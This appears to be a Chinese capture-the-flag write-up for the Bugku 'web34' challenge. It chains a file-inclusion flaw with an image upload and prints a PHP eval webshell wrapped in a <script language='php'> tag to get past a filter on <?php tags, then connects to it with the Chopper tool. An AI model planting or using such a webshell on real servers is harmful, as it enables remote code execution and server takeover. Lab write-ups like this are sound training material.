bugku~web34

bugku~web34
题目描述
hint:文件包含
打开环境
在这里插入图片描述
可以看到url上面有文件包含,查看源码
在这里插入图片描述
出现upload.php,进行访问
在这里插入图片描述
显然这是要文件上传,然后利用文件包含漏洞,控制后台
直接上传一句话木马图片
在这里插入图片描述
然后访问上传的一句话木马
在这里插入图片描述
可以看到对<?php?>进行了过滤
考虑构造<script>payload

<script language="php">
phpinfo();
@eval($_POST[attack]);
</script>

将这段话同样加到图片里去,上传图片,然后访问
在这里插入图片描述
可以看到代码已经执行,然后用菜刀链接
在这里插入图片描述
可以看到flag就在根目录下

---------------------------------------------------------------手动分割

希望这篇文章对你有帮助

已标记关键词 清除标记
相关推荐
©️2020 CSDN 皮肤主题: 深蓝海洋 设计师:CSDN官方博客 返回首页